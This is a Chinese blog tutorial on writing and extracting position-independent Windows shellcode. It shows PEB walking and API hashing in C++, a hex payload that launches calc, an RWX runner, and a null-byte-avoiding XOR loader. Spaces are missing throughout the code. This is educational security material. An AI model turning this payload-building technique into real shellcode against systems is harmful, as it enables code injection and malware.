美文网首页网络安全实验室
Windows shellcode编写和提取细节

Windows shellcode编写和提取细节

作者: 蚁景科技 | 来源:发表于2019-03-04 09:30 被阅读10次

    0x00 shellcode编写

    首先shellcode的编写可以用纯汇编也可以用c++,其两者难易程度可想而知,还是抱住VS的大腿,不过这其中要注意一些代码格式和编译选项,以确保生成的shellcode是地址无关的

    比如像如下代码都会被编译器优化,编译器会把字符串放在常量区,以下代码在vc6能通过,vs2017这些新版本的不能通过,新版本的语意更严谨。

    char*arr = "test";

    实际上是constchar*arr = "test";

    Vc6中反汇编代码如下

    可以看到字符串指针是一个固定的地址,在前面加上const关键字后会发现生成的代码是一样的,可见旧版本的编译器很善解人意,把你不严谨的代码改了

    但是如果以以下的形式写的话,就成了地址无关的代码

    charcmd[] = { 'c','a','l','c','\x00'};

    这样写的需要我们在数组末尾手动添加截断字符

    字符串的绝对地址引用问题解决了,下一个就是函数的调用,是dll的加载基址相关的,不同的操作系统某个dll的加载基址不一样,就需要动态定位,需要得到别的api的地址的话,首先我们需要得到dll的基址,可以通过进程PEB结构中的成员来遍历,遍历到kernel32.dll以后再遍历到GetProcAddress函数的地址和LoadLibrary的地址就万事大吉了,别的函数只需要这两个函数来获取了

    首先获取PEB结构可以直接调用winternl.h里的一个宏

    _PEB*peb = NtCurrentTeb()->ProcessEnvironmentBlock;

    查看其宏定义看似调用了函数,查看反汇编代码发现实则是地址无关的代码

    mov        eax,dword ptr fs:[00000018h]  

    mov        ecx,dword ptr [eax+30h]

    也可以参照teb的结构自己来实现一个GetPeb函数让指令使用更少的字节

    fs:[0x18]处是一个指向TEB自身的指针,TEB结构0x30处是PEB指针

    得到PEB指针后

    LIST_ENTRY*first = peb->Ldr->InMemoryOrderModuleList.Flink;

    可以得到一个双向链表的头指针,但是这个指针指向的结构体并不是LDR_DATA_TABLE_ENTRY,而是里面的一个成员

    所以要想得到节点所对应的LDR_DATA_TABLE_ENTRY结构体指针,我们需要在其基础上减去0x8,再解析这个结构体就ok了

    这里的双向链表结尾的元素的Flink是指向头元素的,所以遍历之前保存头元素的指针,向尾部遍历检测Flink是不是等于头元素指针就ok了

    对于dll的名字,我们可以查看BaseDllName这个成员,FullDllName和BaseDllName的类型是一样的,所以像下面这样获取dllname就好了

    (decltype(dte->FullDllName)*)(DWORD*)&(dte->Reserved4))->Buffer

    获取了dllname计算hash与我们记录好的hash进行比较,大小写字母的hash是一样的

    但是这样获取到的是unicode字符串,我们在写一个getunicodehash就完事了

    DWORDgetHash(constchar*str){

    DWORDh = 0;

    while(*str){

    h= (h >> 13) | (h << (32 - 13));

    h+= *str>= 'a'? *str- 32 : *str;

    str++;

    }

    returnh;

    }

    DWORDgetunicodeHash(constwchar_t*str){

    DWORDh = 0;

    PWORDptr = (PWORD)str;

    while(*ptr) {

    h= (h >> 13) | (h << (32 - 13));

    h+= (BYTE)(*ptr)>= 'a'? (BYTE)(*ptr)- 32 : (BYTE)(*ptr);

    ptr++;

    }

    returnh;

    }

    最终代码如下

    #include”pch.h”

    #include<Windows.h>

    #include<winnt.h>

    #include<winternl.h>

    DWORDgetHash(constchar*str){

    DWORDh = 0;

    while(*str){

    h= (h >> 13) | (h << (32 - 13));

    h+= *str>= 'a'? *str- 32 : *str;

    str++;

    }

    returnh;

    }

    DWORDgetunicodeHash(constwchar_t*str){

    DWORDh = 0;

    PWORDptr = (PWORD)str;

    while(*ptr) {

    h= (h >> 13) | (h << (32 - 13));

    h+= (BYTE)(*ptr)>= 'a'? (BYTE)(*ptr)- 32 : (BYTE)(*ptr);

    ptr++;

    }

    returnh;

    }

    PVOIDgetWinExec() {

    chardllname[] = { 'K','E','R','N','E','L','3','2','.','D','L','L','\x00'};

    charapi[] = { 'W','i','n','E','x','e','c','\x00'};

    _PEB*peb = NtCurrentTeb()->ProcessEnvironmentBlock;

    LIST_ENTRY*first = peb->Ldr->InMemoryOrderModuleList.Flink;

    LIST_ENTRY*ptr = first;

    do{

    LDR_DATA_TABLE_ENTRY*dte = (LDR_DATA_TABLE_ENTRY*)((BYTE*)ptr- 0x8);

    BYTE*baseAddress = (BYTE*)dte->DllBase;

    ptr= ptr->Flink;

    if(!baseAddress)

    continue;

    PIMAGE_DOS_HEADERdosHeader = (PIMAGE_DOS_HEADER)baseAddress;

    PIMAGE_NT_HEADERSntHeader = (PIMAGE_NT_HEADERS)(baseAddress+ dosHeader->e_lfanew);

    DWORDiedRVA =ntHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;

    if(!iedRVA)

    continue;

    PIMAGE_EXPORT_DIRECTORYied = (PIMAGE_EXPORT_DIRECTORY)(baseAddress+ iedRVA);

    if(getunicodeHash(((decltype(dte->FullDllName)*)(DWORD*)&(dte->Reserved4))->Buffer)==getHash(dllname)){

    DWORD*nameRVAs = (DWORD*)(baseAddress+ ied->AddressOfNames);

    for(DWORDi = 0; i < ied->NumberOfNames; i++) {

    char*funcName = (char*)(baseAddress+ nameRVAs[i]);

    if(getHash(funcName)==getHash(api)) {

    WORDordinal = ((WORD*)(baseAddress + ied->AddressOfNameOrdinals))[i];

    DWORDfunctionRVA = ((DWORD*)(baseAddress + ied->AddressOfFunctions))[ordinal];

    returnbaseAddress + functionRVA;

    }

    }

    }

    }while(ptr != first);

    returnNULL;

    }

    voidfunc() {

    charcalc[] = { 'c','a','l','c','\x00'};

    decltype(WinExec)*myWinExec = (decltype(WinExec)*)getWinExec();

    myWinExec(calc,0);

    }

    intmain()

    {

    func();

    return0;

    }

    编译运行一下就弹出了calc

    下面提取shellcode

    我们把主要的逻辑放到了func这个函数里

    下面要配置一下编译选项方便我们提取shellcode

    关闭SDL检查,优化里面使大小最小化,这会缩小shellcode的体积

    内联函数扩展选择只适用于_inline(Ob1),因为我们的func函数太短了,并且我们不希望编译器优化把他给内联了,func当成一个单独的函数方便我们提取,这样就需要选择只适用于_inline(Ob1)

    启用内部函数选择是(/Oi)

    禁用安全检查(/Gs-)

    其中像NtCurrentTeb这个宏里的__readfsdword就是内部函数,启用内部函数会把这些函数调用内联到我们的代码

    优化大小或者速度选择代码大小优先(/Os)

    全程序优化选择是(/GL)

    代码生成中的安全检查选择禁用,如果开启的话编译器会插入一些检查gscookie的函数调用啥的

    启用函数级链接选择是(/Gy)这个可以移除没有被调用的函数

    然后是链接器配置

    常规中的启用增量链接选择否(/INCREMENTAL:NO)

    调试中的生成映射文件选择是(/MAP)这个生成的mapfile可以帮助我们定位函数的位置和长度

    映射文件名:mapfile,随便你指定

    启用COMDAT折叠:是(/OPT:ICF)

    函数顺序:function_order.txt,这个选项可以告诉编译器编译后的代码中函数的排列顺序,我们用shellcode的时候肯定从shellcode的起始位置开始运行,这样我们要把那个func函数放在线性地址的开头

    我们先生成一下,在mapfile里找到func函数,即?func@@YAXXZ

    所以我们的function_order.txt里只需要放一行?func@@YAXXZ就可以了

    在vs2017中还要“常规”—>“调试信息格式”—>选择“程序数据库(/Zi)”或“无”

    还有基本运行时检查改成默认值

    0x01 shellcode提取与运行

    用MassimilianoTomassoli的shellcode提取工具提取shellcode进行测试

    intmain()

    {

    charshellcode[] =

    "\xe8\xff\xff\xff\xff\xc0\x5f\xb9\x54\x03\x02\x02\x81\xf1\x02\x02"

    "\x02\x02\x83\xc7\x1d\x33\xf6\xfc\x8a\x07\x3c\x01\x0f\x44\xc6\xaa"

    "\xe2\xf6\x55\x8b\xec\x51\x51\xc7\x45\xf8\x63\x61\x6c\x63\xc6\x45"

    "\xfc\x01\xe8\x60\x01\x01\x01\x6a\x01\x8d\x4d\xf8\x51\xff\xd0\xc9"

    "\xc3\x64\xa1\x18\x01\x01\x01\xc3\x53\x56\x8b\xf1\x33\xd2\xeb\x12"

    "\x0f\xbe\xcb\xc1\xca\x0d\x80\xfb\x61\x8d\x41\xe0\x0f\x4c\xc1\x03"

    "\xd0\x46\x8a\x1e\x84\xdb\x75\xe8\x5e\x8b\xc2\x5b\xc3\x53\x56\x33"

    "\xdb\x57\x8b\xf9\x8b\xf3\xeb\x14\x0f\xb6\x17\xc1\xce\x0d\x80\x3f"

    "\x61\x8d\x7f\x02\x8d\x4a\xe0\x0f\x42\xca\x03\xf1\x66\x39\x1f\x75"

    "\xe7\x5f\x8b\xc6\x5e\x5b\xc3\x55\x8b\xec\x83\xec\x28\x64\xa1\x18"

    "\x01\x01\x01\x53\x56\x57\x8b\x40\x30\xc7\x45\xd8\x4b\x45\x52\x4e"

    "\xc7\x45\xdc\x45\x4c\x33\x32\xc7\x45\xe0\x2e\x44\x4c\x4c\x8b\x40"

    "\x0c\xc6\x45\xe4\x01\xc7\x45\xe8\x57\x69\x6e\x45\xc7\x45\xec\x78"

    "\x65\x63\x01\x8b\x58\x14\x8b\xc3\x89\x5d\xfc\x8b\x7b\x10\x8d\x0b"

    "\x8b\x1b\x85\xff\x74\x6b\x8b\x47\x3c\x8b\x54\x38\x78\x89\x55\xf8"

    "\x85\xd2\x74\x5a\x8b\x49\x28\xe8\x71\xff\xff\xff\x8d\x4d\xd8\x8b"

    "\xf0\xe8\x42\xff\xff\xff\x3b\xf0\x75\x44\x8b\x75\xf8\x33\xc9\x89"

    "\x4d\xf8\x8b\x44\x3e\x20\x03\xc7\x89\x45\xf4\x39\x4c\x3e\x18\x76"

    "\x2d\x8d\x4d\xe8\xe8\x1f\xff\xff\xff\x89\x45\xf0\x8b\x45\xf8\x8b"

    "\x4d\xf4\x8b\x0c\x81\x03\xcf\xe8\x0c\xff\xff\xff\x3b\x45\xf0\x74"

    "\x1b\x8b\x45\xf8\x40\x89\x45\xf8\x3b\x44\x3e\x18\x72\xe1\x8b\x45"

    "\xfc\x3b\xd8\x75\x86\x33\xc0\x5f\x5e\x5b\xc9\xc3\x8b\x4d\xf8\x8b"

    "\x44\x3e\x24\x8d\x04\x48\x0f\xb7\x0c\x38\x8b\x44\x3e\x1c\x8d\x04"

    "\x88\x8b\x04\x38\x03\xc7\xeb\xdf";

    void*ptr=VirtualAlloc(0, sizeof(shellcode),MEM_COMMIT,PAGE_EXECUTE_READWRITE);

    memcpy(ptr,shellcode, sizeof(shellcode));

    ((void(*)())ptr)();

    return0;

    }

    运行一下成功弹出了calc。下面我们一起来看看这个都脚本做了什么。首先我们先总结一下我们exe的现状,关键逻辑的部分没有绝对地址的引用,都是地址无关的代码,我们的func函数被放到了线性地址的开头,在所有其他的函数之前,_main函数在我们定义的所有的函数的末尾

    如图所示

    _main函数在最后一个,那么他的起始地址就是我们shellcode的长度了,即前面我们从func开始所有的函数的集合的长度

    第一步就是获取这个长度

    获取.text节中这个长度的shellcode,然后给shellcode添加loader,接着修复重定位,查找shellcode里不包含的byte,范围0x00到0xff,找到shellcode里不存在的byte就可以进行异或加密,从而剔除\x00截断字符了,最后再添加解密代码进去,如果没有不存在的字符的话,如果shellcode涉及的字符范围很全面,我们就没有可以挑选来进行异或的操作数了,这样可以把shellcode适当分成两部分或者多部分,分别用不同的操作数进行异或操作。其他的不用说,我们主要看看两个loader处用到的技巧

    q#      call    here

    #  here:

    #      ...

    #  shellcode_start:

    #      <shellcode>

    #  relocs:

    #      off1|off2|...

    #      str1|str2|...

    code= [

    0xE8,0x00, 0x00, 0x00, 0x00,               #   CALL here

    #here:

    0x5E,                                      #   POP ESI

    0x8B,0xFE,                                 #   MOV EDI, ESI

    0x81,0xC6, x[0], x[1], x[2], x[3],         #   ADD ESI, shellcode_start +len(shellcode) - here

    0xB9,y[0], y[1], y[2], y[3],               #   MOV ECX, len(relocs)

    0xFC,                                      #   CLD

    #again:

    0xAD,                                      #   LODSD

    0x01,0x3C, 0x07,                           #   ADD [EDI+EAX], EDI

    0xE2,0xFA                                  #   LOOP again

    #shellcode_start:

    ]

    这里第一句的call,因为我们不能直接操作指令指针寄存器,我们可以通过call下一条指令来压入下一条指令的地址,然后通过popesi放到esi寄存器里,然后参照后面的relocs修正相对偏移,然后异或加密剔除\x00的部分

    code= [

    0xE8,0xFF, 0xFF, 0xFF, 0xFF,                       #   CALL $ + 4

    #here:

    0xC0,                                              #   (FF)C0 = INC EAX

    0x5F,                                              #   POP EDI

    0xB9,xor1[0], xor1[1], xor1[2], xor1[3],           #   MOV ECX, <xorvalue 1 for shellcode len>

    0x81,0xF1, xor2[0], xor2[1], xor2[2], xor2[3],     #   XOR ECX, <xorvalue 2 for shellcode len>

    0x83,0xC7, 29,                                     #   ADD EDI,shellcode_begin - here

    0x33,0xF6,                                         #   XOR ESI, ESI

    0xFC,                                              #   CLD

    #loop1:

    0x8A,0x07,                                         #   MOV AL, BYTE PTR[EDI]

    0x3C,missing_byte,                                 #   CMP AL, <missingbyte>

    0x0F,0x44, 0xC6,                                   #   CMOVE EAX, ESI

    0xAA,                                              #   STOSB

    0xE2,0xF6                                          #   LOOP loop1

    #shellcode_begin:

    ]

    获取当前eip的地址方式与上面一样,只不过是这次的loader本身也不能包含空字节,指令的解码方式是,E8是call指令,后面的地址要加上当前指令的长度才是真正的偏移,E8FF FF FF FF FF 是跳转到-1+5的位置即最后一个FF处,这样就又组成了一句FFC0汇编指令,巧妙地避开了0x00空字节。然后处理了shellcode长度中可能出现的空字节,与之前的找missingbyte用的同样的方法,然后对shellcode进行异或解密,最后运行shellcode

    相关实验

    1. shellcode编写:

    http://www.hetianlab.com/expc.do?ec=ECID172.19.104.182014050817262500001(了解shellcode编写规则)

    2. shellcode编写练习:http://www.hetianlab.com/expc.do?ec=ECID172.19.104.182014071816144300001(掌握shellcode的编写)

    最后偷偷给自己博客和和合天实验室打个广告

    博客http://sayhi2urmom.top/

    合天实验室http://www.hetianlab.com/ 里面好多优质学习资源的呦

    相关文章

      网友评论

        本文标题:Windows shellcode编写和提取细节

        本文链接:https://www.haomeiwen.com/subject/ymcbuqtx.html